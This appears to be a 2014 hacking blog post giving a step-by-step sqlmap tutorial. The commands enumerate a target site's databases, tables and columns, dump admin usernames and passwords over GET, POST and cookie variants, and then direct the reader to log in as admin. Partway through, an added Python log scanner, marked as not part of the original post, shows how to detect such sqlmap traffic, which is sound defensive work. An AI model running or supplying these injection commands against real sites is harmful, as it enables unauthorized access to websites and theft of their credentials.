Wednesday 30 July 2014

HACK WEBSITE USING SQLMAP SQL INJECTION TOOLS FULL TUTORIAL

How to use sqlmap on the GET method
- fingerprinting
First you need a vulnerable website as the target. Once you have a target, open sqlmap and type this command:
./sqlmap.py -u "http://www.target.com/index.php?id=2"
sqlmap will detect whether your target is vulnerable and will tell you the type of vulnerability and the database type. If your target is vulnerable, go to the next step.
- find database name
Type this command to find the database name:
./sqlmap.py -u "http://www.target.com/index.php?id=2" --dbs
In this step, sqlmap will find the database name of your target. For example, I use "web_db" as the database name.
- find tables name
After sqlmap finds the database name, it's time to find the table names. Use this command:
./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db --tables
It will show you the table names inside the "web_db" database. For example, I use "tbl_admin" as the table name.
- find columns name
Now it's time to find what is inside "tbl_admin" in "web_db"; these are the columns. To find the columns, type this command:
./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin --columns
It will show you the list of column names. For example, I find the "user" and "password" columns.
- dump
This command will dump the data from the columns:
./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin -C user,password --dump
I find "user = admin" and "password = adminpass". Now go to the website and find the admin login.
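Seen from the server side, the GET steps above leave a trace in the web access log. The following is an added example (not part of the original post) that scans combined-format log lines for that trace; the sample lines, the IP addresses and the assumption that "id" should always be an integer are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = '''\
198.51.100.7 - - [30/Jul/2014:10:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Jul/2014:10:00:02 +0000] "GET /index.php?id=2 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [30/Jul/2014:10:00:03 +0000] "GET /index.php?id=2%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [30/Jul/2014:10:00:04 +0000] "GET /index.php?id=2%20UNION%20ALL%20SELECT%20NULL HTTP/1.1" 200 40 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.44 - - [30/Jul/2014:10:00:05 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 90 "-" "Mozilla/5.0"
'''

# client ip, method, request target, status, user-agent
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')
# SQL keywords and syntax that have no place in an integer parameter
SQL_TOKENS = re.compile(
    r"\b(?:union|select|information_schema|sleep|benchmark)\b|'|--|/\*", re.I)


def scan(log_text, numeric_params=("id",)):
    """Return {client_ip: sorted list of reasons} for suspicious requests."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, _method, target, _status, agent = m.groups()
        if "sqlmap" in agent.lower():
            findings[ip].add("sqlmap user-agent")
        # parse_qs URL-decodes the values, so %20 and %27 are seen in clear
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                # Assumption: parameters in numeric_params must be plain integers
                if name in numeric_params and not re.fullmatch(r"[0-9]+", value):
                    findings[ip].add(f"non-numeric {name}")
                if SQL_TOKENS.search(value):
                    findings[ip].add(f"sql syntax in {name}")
    return {ip: sorted(reasons) for ip, reasons in findings.items()}


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, reasons)
```

The User-Agent is client-controlled, so treat the parameter checks as the stronger signal. POST bodies such as the login.php data below do not appear in access logs and need application or WAF logging instead.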
How to use sqlmap on the POST method
It works the same way as the GET method, except that you have to pass the POST data to sqlmap. For example, I have a vulnerable site at the "login.php" path. The POST data is "id=admin&pwd=password&submit=login".
How do you find the POST data? Just use "Live HTTP Headers", a Firefox add-on.
- fingerprinting
It works the same way as the GET method. Just type this command:
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login"
- find database name
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" --dbs
- find tables name
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" -D web_db --tables
- find columns name
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" -D web_db -T tbl_admin --columns
- dump
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" -D web_db -T tbl_admin -C user,password --dump
Include a cookie
The method is still the same, but you also pass the cookie:
./sqlmap.py -u "http://www.target.com/index.php?id=2" --cookie="PHPSESSID=123asdqwe456blabla;user=admin"
or
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" --cookie="PHPSESSID=123asdqwe456blabla;user=admin"
Custom parameter
If you have a specific parameter to inject, you can use "-p", as in this command:
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" --cookie="PHPSESSID=123asdqwe456blabla;user=admin" -p "pwd"
sqlmap will inject the "pwd" parameter. Or you can mark the parameter to inject with a star "*", like this:
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=*password&submit=login" --cookie="PHPSESSID=123asdqwe456blabla;user=admin"
cover
If you are a Windows user, don't use "./" to run it in cmd.
Go To Download Software: http://sqlmap.org/
--from PH1K3!
